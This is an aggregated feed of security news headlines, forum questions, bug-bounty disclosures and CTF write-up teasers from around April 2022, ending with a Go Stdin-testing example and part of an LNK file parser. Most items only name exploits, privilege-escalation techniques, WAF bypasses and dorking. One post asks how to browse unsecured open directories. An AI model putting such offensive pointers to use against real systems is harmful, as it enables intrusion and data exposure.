    Article URL: https://media-exp1.licdn.com/dms/document/C562DAQHsEBEOv6vilA/profile-treasury-document-pdf-analyzed/0/1650330515418?e=2147483647&v=beta&t=LKNnvu80n_mLo7USD2tudioeaERrXwGXqYIwNSODO64 Comments URL: https://news.ycombinator.com/item?id=31201656 Points: 1 # Comments: 1

    Hacked Website Threat Report 2021
    Our 2021 Website Threat Research Report details our findings and analysis of emerging and ongoing trends and threats in the website security landscape. We’ve put together this analysis to help keep website owners informed and aware of the dangers posed by malicious actors. This year’s report is a collection of observations made by Sucuri’s Research and Remediation teams from data collected on web-based malware, vulnerable software, and attacks during 2021. The data used in this report is a representative sample of the total number of websites that our Remediation team performed services for throughout the year 2021, as well as more than 132 million SiteCheck scans. Continue reading Hacked Website Threat Report 2021 at Sucuri Blog.


    Steganography for E01 files??
    I have an E01 file that I know has some data inside, but I cant find any software that can extract from an E01 file. It's 2.6GB so I don't really want to do it manually. Do you guys have any suggestions? submitted by /u/KTthemajicgoat [link] [comments]
    Android TV examination
    Hello, has anyone had any experience of examining a device (television) running the Android TV OS or similar? I'm not aware of any digital forensics software (Cellebrite etc) that you could use for such a task so presumably the only option is a manual examination. There seems to be very little information or discussion around this so any thoughts would be appreciated. submitted by /u/dwaynehicks2179 [link] [comments]

    Socket: New tool takes a proactive approach to prevent OSS supply chain attacks
    submitted by /u/feross [link] [comments]
    LAPSUS$: Recent techniques, tactics and procedures
    submitted by /u/digicat [link] [comments]
    Kubernetes Goat - Interactive Kubernetes Security Learning Playground 🚀
    submitted by /u/madhuakula [link] [comments]
    reposaur - use Rego to audit your GitHub org security posture
    submitted by /u/fproulx [link] [comments]
    Colibri Loader's Unique Persistence Technique Using Get-Variable Cmdlet
    submitted by /u/sciencestudent99 [link] [comments]
    Anatomy of a Zero Day - How to decrypt....a robot?
    submitted by /u/312sec [link] [comments]
    How to save Fiddler Everywhere results in the SEQUENCE they were captured? I'm trying to save the raw data IN SEQUENCE as captured but am unable to save in the sequence it was captured.
    submitted by /u/sahastra [link] [comments]
    How to master Google Hacking (Dorking)
    submitted by /u/hisfuntie [link] [comments]
    Bypassing LDAP Channel Binding with StartTLS
    submitted by /u/AlmondOffSec [link] [comments]
    ExtraReplica: cross-account database vulnerability in Azure PostgreSQL
    submitted by /u/sagitz_ [link] [comments]
    nimbuspwn detector (CVE-2022-29799 & CVE-2022-29800) - check whether local system is possibly vulnerable
    submitted by /u/SRMish3 [link] [comments]
    FindFunc: An IDA plugin for advanced function matching by assembly template, constants, string/name/byte reference
    submitted by /u/feberx [link] [comments]
    Elevation of privilege Linux vulnerability: Nimbuspwn
    submitted by /u/0xdea [link] [comments]

    Chrome 102: Window Controls Overlay, a Host of Finished Origin Trials, PWAs as File Handlers and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 102 is beta as of April 28, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Window Controls Overlay for Installed Desktop Web Apps Window controls overlay extends an app's client area to cover the entire window, including the title bar, and the window control buttons (close, maximize/restore, minimize). The web app developer is responsible for drawing and input handling for the entire window except for the window controls overlay. Developers can use this feature to make their installe…

    War in Ukraine / April 27
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »

    Gamified Vaults: Play, Find, Get Paid
    Hats Finance is introducing gamified vaults to the mix, allowing developers, white hats and security experts to test their Solidity… Continue reading on Medium »
    Contact Point Deanonymization Vulnerability in Meta
    This post is about a bug that I found on Meta (aka Facebook) which could be used to find the linked primary email address of an account using mobile… Continue reading on Medium »
    We Rescued $4M from Rari Capital. But Was It Worth It?
    On April 6th, we discovered a verified Fuse pool in Rari Capital used a weak price oracle prone to manipulation. Usually, exploiting a… Continue reading on Medium »
    Subdomain Takeover using Mobile??
    Go to https://virustotal.com. Click on search section enter domain and click on search. Continue reading on Medium »
    It’s All About DMARC
    Hello Everyone, Continue reading on Medium »

    SecWiki News 2022-04-28 Review
    On-chain tracing: a primer on coin-laundering techniques on TRON by ourren; for more recent articles, visit SecWiki

    NFT Crime: From the Simple to the Ingeniously Simple
    If you guessed these two things—a 10-kilo bar of gold and this image from the Bored Ape Yacht Club (BAYC)—cost about the same, roughly $600,000, you’d be right. And if it’s hard to believe this is true, you’d be like almost everyone else in the world. Basically, a one-of-a-kind cartoon in a type of video... The post NFT Crime: From the Simple to the Ingeniously Simple appeared first on TrustedSec.

    PicoCTF 2022 Web Exploitation
    No content preview
    Hacking IPMI and Zabbix in HackTheBox — Shibboleth
    No content preview

    What’s your favorite UEBA these days?
    I’m growing tired of Exabeam at a medium sized enterprise. Just using AA, feeding it from a data lake. I’ve been looking into it, but it can be difficult to cut through marketing jargon to determine if the tools are just SIEMs or if they do the modeling of a UEBA. submitted by /u/justaninfosecaccount [link] [comments]
    Legal Defense asking for Google Username/Password?
    I have a friend who is preparing for a legal defense (defamation case). The company he hired to help prepare the defense asked for all case-associated email. They also asked for his and his team's Google accounts and passwords to "do the email search for them." Obviously no one is going to share that level of access, but is asking enough of a red flag to fire the preparation company? Is this a commonly accepted ask for permission? Any frame of reference here? submitted by /u/Freakskull [link] [comments]

    Fully mastering SSTI from 0 to 1
    SSTI is injection against template engines; an explanation from simple probing to constructing your own exploit.
    FreeBuf morning report | Beijing Health Kit hit by overseas cyberattack; documents reveal Facebook illegally used user data
    On April 28, Beijing Health Kit was hit by a cyberattack during peak usage; preliminary analysis indicates the attack originated from abroad, and Beijing Health Kit services were not affected during the attack.
    On-chain tracing: a primer on coin-laundering techniques on TRON
    There is no mixer on TRON, so how do hackers launder coins?
    Roundup of the latest global cyberattack incidents: government & enterprise
    Government & enterprise: a roundup of representative incidents among the latest cyberattacks worldwide
    Linux Nimbuspwn vulnerabilities could let attackers deploy sophisticated threats
    Attackers could exploit the vulnerabilities for a variety of malicious activities.
    Little impact: Conti activity has only increased after its data leak
    Researchers at Dell-owned security firm Secureworks recently said that despite the recent internal data leak, the Conti ransomware gang remains very active.
    Gartner: 3 essential tools for responding to cybersecurity incidents
    According to information disclosed by Gartner, the average breach cost of security incidents in 2021 reached a 17-year peak.
    US offers $10 million reward for information on 6 members of Russia's Sandworm group
    The US government is offering a reward of up to $10 million for six Russian hackers.
    Top 15 most exploited vulnerabilities of 2021 released, with list
    In a joint advisory, cybersecurity authorities further urged businesses and organizations to patch these vulnerabilities promptly and implement patch management systems to reduce their exposed attack surface.
    Number of exposed databases hit a record high in Q1 this year, with Redis ranked first
    In Q1 2022, the peak number of exposed databases reached 91,200, a historical record.

    Automate Active Directory(Installation(Packer)+Provisioning(Vagrant))
    Hi Readers, Here we will be looking into automation of ad deployment. This challenge is part of Auror Project initiative by Zscaler’s… Continue reading on Medium »

    subdomain takeover (abandoned Zendesk .easycontactnow.com)
    8x8 disclosed a bug submitted by bx_1: https://hackerone.com/reports/1486670

    New dork here, nice place.
    I am confused how this entirely works though. I tried drive.google.com/drive/folders and it just wanted to log me into my own google drive? So I’ve tried using a few of the front ends, and they’re nice. I just don’t feel like I’m stomping through the mud like I wanted, you know? So how does one do the basic, dig through random unsecured files thing? Also, what is a percentage chance I find something fun/dangerous? Glad to be here folks! submitted by /u/Mr_Goodnite [link] [comments]
    A lot of old 3D Images, ranging from 1996-2006
    submitted by /u/cicada-man [link] [comments]

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116 Comments URL: https://news.ycombinator.com/item?id=31188124 Points: 1 # Comments: 0


    Undesignated File during Examination
    When you examine a mobile data set case where the data was previously extracted and your files are not designated, what is the methodology to turn them into workable data like a .db file? My extraction folder is essentially the usual plist and mbdb files and a series of files from 1kb to 2000kb like: Description: 5435435hjhj45454521 Type: File Any terminology or process to explain or aid my Google research would be immensely helpful. submitted by /u/CharsCour [link] [comments]
    What’s after LE forensics?
    Hello InfoSec peeps, I have been a digital forensic analyst for a law enforcement organisation in the UK for about 3 years now. I love digital forensics, but the work within law enforcement has become extremely tedious for several reasons which I assume most of you will be aware of (prohibited images being 90% of the work + not a massive amount of actual analysis going on due to the first reason, as more often than not there is no need). I have experience with the majority of forensic tools you'd expect LE to have and am very well informed regarding laws and legislation. In addition to this, I have very good InfoSec knowledge from self study and research. I am now beginning to explore other career paths but I am slightly lost as to what my potential next steps and career trajectory could…
    Champlain College: M.S. in DF or M.S. InfoTech with DFIR Concentration
    My hope is to enter a digital forensics role, but I also don’t want to pigeonhole my career to only be able to do that. Would I be better off doing InfoTech with DFIR? submitted by /u/invictusliber [link] [comments]

    Looking For Vulnerable Redis Servers (CVE-2022-0543)
    submitted by /u/chicksdigthelongrun [link] [comments]
    DEGU: userland kit that doesn't use sys_clone/sys_execve call to run
    submitted by /u/Background-Degree-50 [link] [comments]
    A flow-based IDS using Machine Learning in eBPF
    submitted by /u/paran0ide [link] [comments]
    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV [link] [comments]
    Hands-on lab for exploiting Psychic Signatures in JWTs
    submitted by /u/DebugDucky [link] [comments]
    Encrypting our way to SSRF in VMWare Workspace One UEM/Airwatch (CVE-2021-22054)
    submitted by /u/FireFart [link] [comments]
    Kubernetes Security Series - https://smart7.in/2022/03/30/Kubernetes-Cluster-Attack-Defense-Importance-of-Network-Policies.html
    submitted by /u/agrawal7 [link] [comments]
    Package Planting: Are You [Unknowingly] Maintaining Poisoned Packages?
    submitted by /u/mkatch [link] [comments]
    CVE-2021-22204 : Exploiting remote code execution within VirusTotal platform in order to gain access to its various scans capabilities
    submitted by /u/Late_Ice_9288 [link] [comments]

    Weird PDF to my gmail account that I accidentally opened in gmail
    Hi everyone, I did a bit of a stupid thing recently. I got this email from an address with a perfectly normal name, and there was a PDF attached to it. I didn't really think much about it (because I get these regularly for university) and clicked the attachment so that it opened in that weird Gmail viewer. I didn't download it, just clicked the attachment. I didn't actually know the email address, just clicked without thinking. Then I realized that the body of the email was just gibberish letters and numbers with spaces arbitrarily between, something like "ashene qlossa 90442 12394" and so on (I would prefer not to copy-paste the entire thing here in case it's something actually meaningful to someone). Obviously not legitimate. The attachment itself started as this sex website advertisement thing, but the further you went down, it was just weird numbers and lines in different colors. When I saw that, I closed the attachment immediately. I realized that the PDF had a link attached over the entire thing (all of the PDF linked to a different website, essentially), but I didn't click, just had the attachment open for 2-3 seconds tops. So my question is... could anything bad have happened while I had the PDF open in the Gmail viewer? A full Windows Defender scan didn't show anything afterwards and the PDF is safe according to VirusTotal, which just confused me more because obviously the PDF has to be unsafe in some way, right? Sorry for the rambling post, I'm just a bit unsure about what exactly this is. Would appreciate any help. submitted by /u/Pronounta [link] [comments]
    Compromised Internet Router (need advice)
    Is it possible that someone who had access to my router installed a firewall program and is restricting my access to certain sites? I ask because I am able to access said site on my mobile device on mobile data, and when I use a mobile data hotspot on my PC; however, when I connect to my WiFi I can't gain access to said site on my PC or my mobile. Any advice on how to detect such a thing or to prevent such a thing from occurring again would be greatly appreciated. submitted by /u/Severe_Document2108 [link] [comments]
    Password Manager with Blind Autofill?
    Looking for a psw manager that can fill fields without displaying the information. I.e. a saved credit card can be used to make purchases by a registered low permissions user without being displayed in manager / in browser after filled. Please let me know if you know any solution that fits the bill thx. submitted by /u/polloloco067 [link] [comments]
    Where do you store shared QR Codes?
    Looking for any solutions anyone has for storing shared QR codes. For example, one that might be needed for an Authenticator rotating one-time-password app that a team of people share. The ideal solution would be the same place a shared password is kept for one-stop shopping for these types of secrets. submitted by /u/Johnny_BigHacker [link] [comments]
    Seeking Advice: moving from productivity based in a security firm to high level individual contributor and primary security expertise -- how to quickly adapt?
    Salutations! I believe this may be the right place to ask so here goes: Background: I worked my way up from help desk into security, and now I'm professional level (5+ years). My previous positions have all been with technically gifted security firms where there were several layers of professionals and safety nets above me and below me; both in terms of expertise and relationships. Being around fellow security specialists day in and day out is a privilege I didn't previously realize. Situation: I currently am a new hire to a company whose maturity model is still being developed and I am now one of the few primary security disciplines on staff and work with a cross functional team who are all people leaders. This is intimidating and somewhat stressful, I know deep down I am capable to…
    Sysmon for SME <50 employees?
    I'm an IT jack-of-all-trades / master-of-none for a small business with about 40 users, give or take. I'm also thinking of pursuing a career in Netsec, seeing as I basically have my own environment to play with... I've taken great strides in Netsec and am going to be sitting my CISSP soon. I have implemented endpoint security, tidied up AD (particularly admin) accounts, set up 3-2-1 backups, etc. Anyway, my question is on the SIEM side. Being a small business, I've found SIEMs a) very expensive and b) hard to get my head around. One suggestion I've seen a few times is enabling Sysmon and using some kind of open-source product to monitor - GRR? SNORT? - Is Sysmon going to eat up resources (per device)? - Being a newbie/scrub, will I get meaningful info? Is this worth pursuing? Is this a must? I do have time and energy to invest in this. Appreciate any responses and hopefully not too much scoffing at my noobness! submitted by /u/saladnicoise [link] [comments]
    Search engine pre-registration (Criminal IP ????)
    I'm currently a student studying vulnerability and security. I mainly use OSINT and search engines to study security. I know that there are many products for search engines, such as Censys and Shodan. I used Shodan for a certain period of time, and first of all, I felt that the performance was good. But as a student, there is a burden in terms of price. So I once shared a list of search engines that people use in the OSINT community, and there was a search engine called Criminal IP. It's a search engine similar to Shodan, and the functions are very similar. But as I'm just starting to study security, I still don't know which search engines are highly utilized. So I'm trying to use this and that. This time, Criminal IP has opened registration for its beta test, and I registered in advance and got a free pass for 6 months. If there are students who have a price burden to use Shodan, I think you can refer to it. Below is the list of search engines that I shared before and the Criminal IP URL that I applied for the beta test. Oh! And since it's sharing for studying, I hope you don't think it's a promotion or an advertisement! https://criminalip.io https://www.reddit.com/r/OSINT/comments/u0yv15/search_engines_for_people_doing_osint/?utm_source=share&utm_medium=web2x&context=3 submitted by /u/Alexiosplana [link] [comments]

    RFC 9116: A File Format to Aid in Security Vulnerability Disclosure
    Article URL: https://www.rfc-editor.org/rfc/rfc9116.html Comments URL: https://news.ycombinator.com/item?id=31184926 Points: 5 # Comments: 0
    VirusTotal debunks claims of a serious vulnerability in Google-owned antivirus
    Article URL: https://portswigger.net/daily-swig/virustotal-debunks-claims-of-a-serious-vulnerability-in-google-owned-antivirus-service Comments URL: https://news.ycombinator.com/item?id=31182396 Points: 2 # Comments: 1
    Commit Level Vulnerability Dataset (For Android)
    Article URL: https://blog.quarkslab.com/commit-level-vulnerability-dataset.html Comments URL: https://news.ycombinator.com/item?id=31180203 Points: 1 # Comments: 1
    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    Article URL: https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ Comments URL: https://news.ycombinator.com/item?id=31179270 Points: 15 # Comments: 1

    NASA FTP with data organized by mission, and some file conversion software too
    The Space Physics Data Facility (SPDF) hosts the NASA non-solar heliophysics archive of current and past heliophysics missions and related ground-based and non-NASA data. https://spdf.gsfc.nasa.gov/pub/ submitted by /u/osendai [link] [comments]
    dorky band photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    pictures of antiques
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Many, many pictures of clothes and accessories on display.
    submitted by /u/HGMIV926 [link] [comments]

    Passive Reconnaissance Using Only Kali Terminal | Infosec |
    Disclaimer: This blog is only for educational purpose. Continue reading on System Weakness »
    You need to hear this if you are new/want to start bug hunting
    Hello everyone, Continue reading on Medium »
    Bypassing WAF for $2222
    I know it’s been a very long time since I last published my article on how I was able to find RCE on Bentley systems. For the last 1–1.5… Continue reading on Medium »
    AD Pentesting Notes
    If you just have access to an AD environment but you don’t have any credentials/sessions you could: Pentest the network: Scan the network… Continue reading on Medium »
    4EVERLAND officially launches the "First Leap Program" with prizes of up to 15 million 4EVER
    Greetings to all users, Continue reading on Medium »

    War in Ukraine / April 26
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »

    What are red-blue teams in hacking?
    A red team is an offensive security professional with expertise in breaking into defenses and attacking systems. A blue team, on the other… Continue reading on Medium »
    What are the types of white box testing?
    White box testing happens to be a form of software testing, which assesses the internal working structure of an application. It also… Continue reading on Medium »

    FreeBuf morning report | British Army recruitment site offline for over a month after data breach; New York may bring crypto fraud into criminal law
    Starting April 27, Google is rolling out app privacy policies on the official Android app store Google Play; Android users will be able to see what private data an app collects (and its purpose and use).
    Confirmed! Coca-Cola confirms cyberattack and launches investigation
    Coca-Cola, the world's largest soft drink maker, confirmed in a recent statement that company networks were attacked and that an investigation into the attack is under way.
    Android trojan VajraSpy disguised as chat app targets Pakistani military
    Researchers found that the APT-Q-43 group used the VajraSpy trojan disguised as a chat app called Crazy Talk to attack Pakistani military personnel.
    Ningbo Commerce Bank Co., Ltd. is hiring for security management positions
    Ningbo Commerce Bank Co., Ltd. is hiring 2 security management staff.
    Building and evolving software composition analysis (SCA) capability
    This article describes the process of actually deploying SCA capability within an enterprise, the problems encountered, and views and outlook on SCA technology.
    Hackers exploit critical VMware RCE vulnerability to install backdoors
    Advanced hackers are actively exploiting CVE-2022-22954, a critical remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access.
    Report "China's Cybersecurity Universe: Efficient Operations from Security Services to MSS" officially released
    To understand the strategic significance of managed security services (MSS) for China's cybersecurity development, FreeBuf Consulting conducted in-depth research combining quantitative and qualitative analysis.
    Black Basta ransomware attacks the American Dental Association
    The American Dental Association suffered a cyberattack. The association is actively investigating the incident and has shut down some network systems.
    Cybersecurity included in performance assessment of central state-owned enterprise executives
    The Measures bring cybersecurity into the assessment scope and impose corresponding sanctions on executives depending on the circumstances, further raising central SOEs' ability to guard against major cybersecurity incidents.
    Full translation of the Dirty Pipe vulnerability report
    A translation of the English Dirty Pipe vulnerability article; some memory locations in the text were modified because they involved sensitive characters.
    Is Log4Shell old news? The attack surface is still widespread
    Research shows that patching of the Log4Shell vulnerability is not encouraging; many organizations are still running outdated or vulnerable versions.
    "Cybersecurity New Forces" is calling in, pick up!
    The "Cybersecurity New Forces Solo Launch Season" invites you to join~

    SecWiki News 2022-04-27 Review
    Advanced CodeQL knowledge (Java) by ourren; Learning features from source code control flow graphs to locate defects by ourren; A blueprint for evading industry leading endpoint protection in 2022 by ourren; for more recent articles, visit SecWiki

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize

    Container escape on public GitLab CI runners
    GitLab disclosed a bug submitted by ec0: https://hackerone.com/reports/1442118
    CVE-2022-27776: Auth/cookie leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1547048
    CVE-2022-27775: Bad local IPv6 connection reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1546268
    CVE-2022-27774: Credential leak on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1543773

    Using PGP to enhance security and non-repudiation of terraform ops
    No content preview

    What is the one thing ( or skill ) that you should focus on in exploit dev?
    submitted by /u/morizk90 [link] [comments]
    developing a remote exploit for a stack overflow in Linux CVE-2022-0435, not including KASLR
    submitted by /u/ozxsl2w3kejkhwakl [link] [comments]

    Homeland Security agency scene reveals a large number of deficiencies
    Continue reading on Medium »
    Untitled
    Self XSS Continue reading on Medium »
    My Pentest Log -16- (XS Size A Little Tip)
    Greetings to all from a springtime Constantinople, Continue reading on Medium »

    KrbRelayUp - local privilege escalation in Windows domain environments where LDAP signing is not enforced
    submitted by /u/0xdea [link] [comments]
    Introduction to VirtualBox security research and fuzzing
    submitted by /u/nibblesec [link] [comments]
    Thinkstscapes Q1 2022 research round-up
    submitted by /u/ranok [link] [comments]
    New CloudGoat scenario: Vulnerable-by-Design Lambda functions
    submitted by /u/hackers_and_builders [link] [comments]
  • Open

    Vulnerability Roundup – April 2022
    Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. Remote Code Execution (RCE): Elementor WordPress Plugin (Installations: 5,000,000+; Patched Version: 3.6.3; Vulnerability: Remote code execution (RCE); Severity: Critical; CVE: CVE-2022-1329). This critical vulnerability stems from a lack of capability checks in vulnerable versions of the Elementor plugin. Continue reading Vulnerability Roundup – April 2022 at Sucuri Blog.
  • Open

    SQL Injection on https://soa-accp.glbx.tva.gov/ via "/api/" path - VI-21-015
    Tennessee Valley Authority disclosed a bug submitted by yassinek3ch: https://hackerone.com/reports/1125752
    Stored XSS in "product type" field executed via product filters
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1404770 - Bounty: $500
    RCE via exposed JMX server on jabber.37signals.com/jabber.basecamp.com
    Basecamp disclosed a bug submitted by ian: https://hackerone.com/reports/1456063 - Bounty: $100
  • Open

    Windows Indexing Locations
    Hi all, I’m trying to see if a Windows 10 Pro computer was set up so that when a USB drive was connected, it would index the files/folders on the drive. Does anyone know where this information is stored? I’m thinking it’s a registry key but I’m not finding too much info online about it. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]
  • Open

    OSINT of website…
    Let’s look at the topic of information sources for OSINT research of websites today. I’ll be interested to learn about the personalities… Continue reading on Medium »
    War in Ukraine / April 25
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Will Elon Musk Revolutionize The World of OSINT and Campaigns?
    Elon Musk’s effort to acquire Twitter passed an important milestone yesterday when Twitter’s Board of Directors recommended to accept his… Continue reading on Medium »
  • Open

    Finding IP addresses in a Network
    When you land on a huge big network with several VLAN’s and are unsure of where to look or start! Continue reading on Medium »
    TryHackme — Alfred(Exploit Jenkins Service Gain To Authority/System)
    Hi everyone, in this article I will share a write-up of the TryHackMe machine named Alfred; this machine focuses on Jenkins technology… Continue reading on Medium »
    gcpHound v2.0 : Django Web UI To Analyze IAM Permissions
    In this article, we will talk about recent functionalities added to the gcpHound as well as how to use them. Continue reading on Medium »
  • Open

    Advanced Docker Security Part II
    Introduction Continue reading on InfoSec Write-ups »
    Tryhackme: Anonymous
    No content preview
    Tryhackme: AgentSudo
    No content preview
  • Open

    Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-04-26 Review
    Overview of the lab assignment platform for the “Software Analysis” course by ourren; Notes on the pitfalls of automated scanning with xray linked to crawlergo by sinver; Dumping Lsass credentials using remote process forking by sinver; A full walkthrough from vulnerability discovery to domain controller during an HW (network defense) exercise by sinver; A Discuz X3.4 backend getshell by sinver; A small trick for obtaining domain controller hashes without AV evasion by sinver; Using the ProxyShell vulnerability to obtain all domain controller hashes by sinver; Essential red team skills: stealth techniques by sinver; An ethical anti-fraud system for mobile payments by ourren; Pentest_Note: records of routine penetration testing operations by ourren. For more of the latest articles, visit SecWiki
  • Open

    Overwhelmed by vulnerabilities? Here’s the best way to prioritize them.
    We know that software vulnerabilities remain one of the primary causes of external attacks. We also know that on average, vulnerabilities are exploited for the first time just days after they’re disclosed. You may be managing many third-party applications, so how can you make sure you can drive remediation and reduce the risk for all your software? Once vulnerabilities are discovered, how will you know which ones should be prioritized? A common misconception is that every vulnerability in your organization should be addressed immediately, but keeping up with vulnerability disclosures that affect your environment is a constant, ongoing challenge. It…
  • Open

    Writing test code for Stdin in Go
    When writing test code, function argument values we can predict are easy to check, but for data that comes in from the system, the moment you actually try to write the test you start wondering how to go about it. Today I want to talk about one of those cases: writing test code for Stdin. Pipe trick: Stdin can be controlled in test code using os.Pipe() and a simple trick. os.Pipe(): first, os.Pipe() has the return values shown below. Reading the description, the first return value r and the second return value w are File objects connected to each other.
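    The pipe trick described above, as an added example that is not code from the original post: PromptYesNo reads from the package-level os.Stdin, and WithStdin swaps os.Stdin for the read end of an os.Pipe() for the duration of the call and restores it afterwards. The function names, the yes/no prompt and the input strings are assumptions made for this example.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// PromptYesNo reads one line from the package-level os.Stdin and reports
// whether the operator answered yes. Reading os.Stdin directly (instead of
// an injected io.Reader) is exactly what makes this hard to test without
// the pipe trick. A missing trailing newline (EOF after some text) is
// still treated as an answer; an empty stream is reported as an error.
func PromptYesNo() (bool, error) {
	line, err := bufio.NewReader(os.Stdin).ReadString('\n')
	if err != nil && line == "" {
		return false, err
	}
	switch strings.ToLower(strings.TrimSpace(line)) {
	case "y", "yes":
		return true, nil
	default:
		return false, nil
	}
}

// WithStdin runs fn with os.Stdin temporarily replaced by the read end of
// an os.Pipe() carrying input, then restores the original os.Stdin.
// The write end is closed after writing so the reader sees EOF instead of
// blocking forever. (Assumption: input is smaller than the OS pipe buffer;
// larger inputs would need the write moved into a goroutine.)
func WithStdin(input string, fn func() error) error {
	r, w, err := os.Pipe()
	if err != nil {
		return err
	}
	orig := os.Stdin
	os.Stdin = r
	defer func() {
		os.Stdin = orig
		r.Close()
	}()
	if _, err := w.WriteString(input); err != nil {
		w.Close()
		return err
	}
	w.Close()
	return fn()
}

// AnswerFor is the test-facing wrapper: feed input through the pipe and
// return what PromptYesNo decided.
func AnswerFor(input string) (bool, error) {
	var answer bool
	err := WithStdin(input, func() error {
		var e error
		answer, e = PromptYesNo()
		return e
	})
	return answer, err
}

func main() {
	for _, in := range []string{"yes\n", "n\n", "Y", ""} {
		ok, err := AnswerFor(in)
		fmt.Printf("%q -> ok=%v err=%v\n", in, ok, err)
	}
}
```

    The restore happens in a defer so a panicking fn cannot leave the test process with a dangling os.Stdin; tests that share the process must not run in parallel while it is swapped.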
  • Open

    CVE-2022-24706: Apache CouchDB Remote Privilege Escalation
    Article URL: https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 Comments URL: https://news.ycombinator.com/item?id=31167557 Points: 2 # Comments: 1
  • Open

    Defending the Gates of Microsoft Azure With MFA
    Since Russia’s invasion of Ukraine, companies based in the United States have been on alert for potential cyberattacks on IT infrastructure. Multi-Factor Authentication (MFA) has been one of the most recommended settings for organizations to turn on. Recently, the White House issued a FACT SHEET on how organizations can protect themselves against potential cyberattacks from... The post Defending the Gates of Microsoft Azure With MFA appeared first on TrustedSec.
  • Open

    Java Code Audit: Dangerous Function Analysis and Exploitation (Part 2)
    Starting now, I will continue sharing the problems I encountered while studying code auditing, as well as my personal insights from that study.
    Interview with F5’s Chen Liang: Applications and Security in the Wave of Digitalization
    How to effectively relieve the pressure of proliferating applications, mitigate enterprise cyber-security risk, and let enterprises’ digital transformation proceed safely is a problem enterprises need to solve.
    FreeBuf Morning Report | Iranian hackers exploit RCE vulnerability to deploy a backdoor; BotenaGo variant targets Lilin cameras
    The threat actor Rocket Kitten is actively exploiting a VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on systems.
    Tophant Attack-and-Defense Exercise Handbook Series: The Divine Sword Unsheathed
    The 2022 large-scale attack-and-defense exercises are coming; are you ready?
    Book giveaway | For building enterprise data security, this book is indispensable!
    “A Practical Guide to Data Security” interprets each process area of the data security lifecycle one by one and offers practical operational advice.
    Iran announces it foiled large-scale cyberattacks on public services
    Recently, Iranian state television announced that several large-scale cyberattacks had been foiled; their targets were public services run by government and private organizations.
    CISA adds 7 new vulnerabilities to its Known Exploited Vulnerabilities catalog
    CISA has added 7 new vulnerabilities to its list of actively exploited security issues.
    Virus spreads via the DriverGenius (驱动人生) update channel and a high-risk vulnerability, infecting tens of thousands of computers in half a day on December 14
    On December 14, a virus spreading via the DriverGenius update channel and a high-risk vulnerability infected tens of thousands of computers in half a day.
    Google fixes high-severity RCE vulnerability in the VirusTotal platform
    A security vulnerability in the VirusTotal platform could have been exploited by attackers to achieve remote code execution.
    US accuses North Korean APT of using new malware to attack journalists
    On April 25 local time, the US news site NK News reported that the North Korea-backed APT37 was using a new malware sample to attack journalists covering North Korea.
    Russia-Ukraine conflict drives DDoS attacks to an all-time high
    Compared with Q4 2021, DDoS attacks in Q1 2022 increased by 46%, with most of the attacks directed against Russia.
  • Open

    File Formats
    Having an understanding of file formats is an important factor in DFIR work. In particular, analysts should understand what a proper file using a particular format should look like, so that they can see when something is amiss, or when the file itself has been manipulated in some manner. Understanding file formats goes well beyond understanding PE file formats and malware RE. Very often, various Microsoft file formats include data, or metadata (defined as "data about data"), that can be mined/parsed and then leveraged to tremendous effect, furthering overall analysis and intelligence development, often across multiple cases and campaigns. LNK: Windows shortcut, or LNK, files have been covered extensively in this blog, as well as other blogs, in addition to having been well documented by MS…
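    As an added example (not code from the original post) of the "know what a proper file looks like" point applied to LNK: a parser for the fixed 76-byte ShellLinkHeader defined in MS-SHLLINK. It rejects input whose HeaderSize or LinkCLSID is wrong, and reports the header fields an analyst usually looks at first (reserved bytes that must be zero, ShowCommand, HasArguments, and whether any conventional target is present). The function names and the constructed sample headers are this example's own.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

// MS-SHLLINK 2.1: HeaderSize MUST be 0x0000004C and LinkCLSID MUST be
// {00021401-0000-0000-C000-000000000046}, stored in on-disk GUID byte order.
const shellLinkHeaderSize = 0x4C

var linkCLSID = []byte{0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46}

// LinkFlags bits (MS-SHLLINK 2.1.1) used below.
const (
	flagHasLinkTargetIDList uint32 = 1 << 0
	flagHasLinkInfo         uint32 = 1 << 1
	flagHasArguments        uint32 = 1 << 5
	flagIsUnicode           uint32 = 1 << 7
)

// ShowCommand values listed by the spec; any other value is to be treated as SW_SHOWNORMAL.
const (
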